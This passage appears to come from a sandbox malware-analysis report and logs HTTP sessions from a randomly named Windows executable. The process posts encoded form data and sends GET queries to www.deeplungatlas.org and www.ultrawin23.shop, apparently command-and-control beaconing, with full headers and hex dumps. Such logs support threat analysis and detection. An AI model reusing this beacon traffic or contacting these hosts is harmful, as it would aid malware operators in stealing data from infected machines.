                                                              7           192.168.2.7  49983        194.9.94.85     80                1396  C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Nov 12, 2024 15:31:31.371136904 CET  1655               OUT        POST /57zf/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.deeplungatlas.org
                                                              Origin: http://www.deeplungatlas.org
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 1250
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.deeplungatlas.org/57zf/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:31:32.234817028 CET  1236               IN         HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:31:32 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Powered-By: PHP/8.1.29
                                                              Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><!-- Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script><!-- End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                              Nov 12, 2024 15:31:32.234837055 CET  1236               IN
                                                              Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                              Nov 12, 2024 15:31:32.234849930 CET  424                IN
                                                              Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                              Nov 12, 2024 15:31:32.234863043 CET  1236               IN
                                                              Data Ascii: <div class="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainna
                                                              Nov 12, 2024 15:31:32.234877110 CET  1236               IN
                                                              Data Ascii: web&utm_content=dns">Read more at loopia.com/loopiadns »</a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need
                                                              Nov 12, 2024 15:31:32.234889030 CET  454                IN
                                                              Data Ascii: ><a href="https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https:/


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              8           192.168.2.7  49984        194.9.94.85     80                1396  C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Nov 12, 2024 15:31:33.913113117 CET  345                OUT        GET /57zf/?ZtwlQ=RSXDvmZ18TUSGahlBulUTEWs/Fcq4D9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmiwp/JS/jJT11lfoMCLi5cvamonTeSDCRL83RdCYlcDH7pRdqC9V4SuntT&ZX=G2OXK HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Host: www.deeplungatlas.org
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:31:34.753211021 CET  1236               IN         HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:31:34 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Powered-By: PHP/8.1.29
                                                              Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                              Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                              Nov 12, 2024 15:31:34.753319025 CET | 212 | IN | Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                              Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
                                                              Nov 12, 2024 15:31:34.753336906 CET | 1236 | IN | Data Raw: 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65
                                                              Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
                                                              Nov 12, 2024 15:31:34.753348112 CET | 1236 | IN | Data Raw: 20 73 74 61 72 74 65 64 3f 20 4c 6f 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73
                                                              Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
                                                              Nov 12, 2024 15:31:34.753365993 CET | 424 | IN | Data Raw: 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70
                                                              Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
                                                              Nov 12, 2024 15:31:34.753473043 CET | 1236 | IN | Data Raw: 67 65 73 20 69 6e 63 6c 75 64 65 20 65 76 65 72 79 74 68 69 6e 67 20 79 6f 75 20 6e 65 65 64 20 74 6f 20 67 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20
                                                              Data Ascii: ges include everything you need to get started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_
                                                              Nov 12, 2024 15:31:34.753484011 CET | 242 | IN | Data Raw: 3e 3c 62 72 20 2f 3e 0a 09 09 09 09 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75
                                                              Data Ascii: ><br /><p><a href="https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              9 | 192.168.2.7 | 49985 | 170.39.213.43 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:31:40.265789032 CET | 616 | OUT | POST /53y2/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.ultrawin23.shop
                                                              Origin: http://www.ultrawin23.shop
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 218
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.ultrawin23.shop/53y2/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 67 39 68 79 30 71 79 32 66 52 52 74 46 2b 48 39 69 4f 63 54 30 78 64 59 74 35 74 6a 6c 5a 5a 42 31 4e 30 4d 63 52 62 37 6b 55 62 33 71 55 32 61 73 7a 34 63 6f 39 47 41 38 63 54 53 39 45 34 62 67 48 59 66 52 73 52 4b 54 30 52 68 6d 39 73 48 70 5a 79 79 67 68 52 65 61 53 53 43 4f 62 71 77 46 33 43 36 31 36 61 4e 55 4d 73 67 73 71 69 43 65 52 48 6c 66 46 4e 78 74 2f 79 4f 51 7a 30 34 48 39 58 73 6e 31 50 69 66 52 68 2b 51 4e 72 53 42 37 74 4e 71 4e 42 59 4e 55 44 43 66 78 33 7a 4d 77 4a 56 33 48 5a 66 41 6c 7a 5a 6f 72 62 70 33 57 31 73 67 6f 75 56 71 33 4d 43 44 73 48 55 48 4a 4a 35 38 4c 2b 6c 6e 4a 6a 31 54 49 4e 45 6b 67 3d 3d
                                                              Data Ascii: ZtwlQ=g9hy0qy2fRRtF+H9iOcT0xdYt5tjlZZB1N0McRb7kUb3qU2asz4co9GA8cTS9E4bgHYfRsRKT0Rhm9sHpZyyghReaSSCObqwF3C616aNUMsgsqiCeRHlfFNxt/yOQz04H9Xsn1PifRh+QNrSB7tNqNBYNUDCfx3zMwJV3HZfAlzZorbp3W1sgouVq3MCDsHUHJJ58L+lnJj1TINEkg==
                                                              Nov 12, 2024 15:31:40.860546112 CET | 907 | IN | HTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              content-type: text/html
                                                              content-length: 707
                                                              date: Tue, 12 Nov 2024 14:31:40 GMT
                                                              server: LiteSpeed
                                                              location: https://www.ultrawin23.shop/53y2/
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              10 | 192.168.2.7 | 49986 | 170.39.213.43 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:31:42.807125092 CET | 636 | OUT | POST /53y2/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.ultrawin23.shop
                                                              Origin: http://www.ultrawin23.shop
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 238
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.ultrawin23.shop/53y2/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 67 39 68 79 30 71 79 32 66 52 52 74 47 66 33 39 75 4e 30 54 78 52 64 62 78 70 74 6a 2b 4a 5a 46 31 4e 6f 4d 63 55 72 52 6b 47 76 33 6b 57 2b 61 2b 6e 73 63 6d 64 47 41 6b 4d 53 57 7a 6b 34 53 67 48 63 70 52 73 39 4b 54 30 56 68 6d 34 49 48 70 75 47 39 67 78 52 59 44 43 53 45 42 37 71 77 46 33 43 36 31 36 65 6e 55 4b 45 67 74 61 53 43 59 31 62 6d 42 56 4e 32 73 2f 79 4f 55 7a 30 38 48 39 58 30 6e 33 37 49 66 55 39 2b 51 50 44 53 43 71 74 4f 2f 64 42 6b 43 30 43 2b 58 54 66 35 4c 78 6c 38 39 56 68 52 4e 6c 58 4a 6b 39 61 4c 74 30 35 41 2b 35 57 75 75 31 6f 30 55 4b 61 68 46 49 4e 68 78 70 4b 45 34 2b 47 66 65 61 73 41 79 54 6f 42 4a 74 55 6d 6d 49 39 64 39 34 77 2b 64 46 36 56 68 54 38 3d
                                                              Data Ascii: ZtwlQ=g9hy0qy2fRRtGf39uN0TxRdbxptj+JZF1NoMcUrRkGv3kW+a+nscmdGAkMSWzk4SgHcpRs9KT0Vhm4IHpuG9gxRYDCSEB7qwF3C616enUKEgtaSCY1bmBVN2s/yOUz08H9X0n37IfU9+QPDSCqtO/dBkC0C+XTf5Lxl89VhRNlXJk9aLt05A+5Wuu1o0UKahFINhxpKE4+GfeasAyToBJtUmmI9d94w+dF6VhT8=
                                                              Nov 12, 2024 15:31:43.391102076 CET | 907 | IN | HTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              content-type: text/html
                                                              content-length: 707
                                                              date: Tue, 12 Nov 2024 14:31:43 GMT
                                                              server: LiteSpeed
                                                              location: https://www.ultrawin23.shop/53y2/
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              11 | 192.168.2.7 | 49987 | 170.39.213.43 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:31:45.357175112 CET | 1649 | OUT | POST /53y2/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.ultrawin23.shop
                                                              Origin: http://www.ultrawin23.shop
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 1250
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.ultrawin23.shop/53y2/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 67 39 68 79 30 71 79 32 66 52 52 74 47 66 33 39 75 4e 30 54 78 52 64 62 78 70 74 6a 2b 4a 5a 46 31 4e 6f 4d 63 55 72 52 6b 47 58 33 6b 6b 47 61 73 56 45 63 6c 64 47 41 36 63 53 62 7a 6b 35 51 67 44 34 31 52 73 42 38 54 32 64 68 70 2b 45 48 72 63 75 39 76 78 52 59 4d 69 53 46 4f 62 71 70 46 30 36 32 31 36 75 6e 55 4b 45 67 74 59 4b 43 50 78 48 6d 47 6c 4e 78 74 2f 79 43 51 7a 30 41 48 39 66 4b 6e 33 2f 79 65 6e 6c 2b 51 76 54 53 44 63 52 4f 69 74 42 63 4c 6b 43 6d 58 54 43 6a 4c 31 39 34 39 52 6f 45 4e 69 6a 4a 6e 6f 44 66 77 6e 46 44 38 66 2b 42 77 30 45 6f 62 34 4f 49 49 70 35 67 75 62 75 4e 35 4d 71 71 53 71 68 41 2b 56 70 65 64 63 77 4b 76 4c 70 64 78 34 56 32 4f 48 53 75 77 6b 49 5a 72 67 70 6d 73 63 36 47 64 39 4f 72 67 42 35 4a 4a 76 4a 4e 48 36 6d 43 59 36 72 52 66 63 32 6e 4c 66 31 79 35 43 48 76 58 63 61 32 4e 56 62 79 4d 53 52 35 56 4a 37 76 74 61 36 4f 54 4f 46 61 41 63 47 6c 45 6c 67 71 6c 2b 6c 4e 76 37 37 36 46 79 74 70 57 68 79 35 6e 5a 30 65 78 32 48 36 73 37 2b 73 [TRUNCATED]
                                                              Data Ascii: ZtwlQ=g9hy0qy2fRRtGf39uN0TxRdbxptj+JZF1NoMcUrRkGX3kkGasVEcldGA6cSbzk5QgD41RsB8T2dhp+EHrcu9vxRYMiSFObqpF06216unUKEgtYKCPxHmGlNxt/yCQz0AH9fKn3/yenl+QvTSDcROitBcLkCmXTCjL1949RoENijJnoDfwnFD8f+Bw0Eob4OIIp5gubuN5MqqSqhA+VpedcwKvLpdx4V2OHSuwkIZrgpmsc6Gd9OrgB5JJvJNH6mCY6rRfc2nLf1y5CHvXca2NVbyMSR5VJ7vta6OTOFaAcGlElgql+lNv776FytpWhy5nZ0ex2H6s7+s [TRUNCATED]
                                                              Nov 12, 2024 15:31:45.950088978 CET | 907 | IN | HTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              content-type: text/html
                                                              content-length: 707
                                                              date: Tue, 12 Nov 2024 14:31:45 GMT
                                                              server: LiteSpeed
                                                              location: https://www.ultrawin23.shop/53y2/
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              12 | 192.168.2.7 | 49988 | 170.39.213.43 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:31:47.998218060 CET | 343 | OUT | GET /53y2/?ZtwlQ=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6ylAR+OjeKP5reZGyzx4OrXvFvuqWHYyr9YQxhjYSLaT0UH6C6o1S+flVa&ZX=G2OXK HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Host: www.ultrawin23.shop
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:31:48.571270943 CET | 1063 | IN | HTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              content-type: text/html
                                                              content-length: 707
                                                              date: Tue, 12 Nov 2024 14:31:48 GMT
                                                              server: LiteSpeed
                                                              location: https://www.ultrawin23.shop/53y2/?ZtwlQ=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6ylAR+OjeKP5reZGyzx4OrXvFvuqWHYyr9YQxhjYSLaT0UH6C6o1S+flVa&ZX=G2OXK
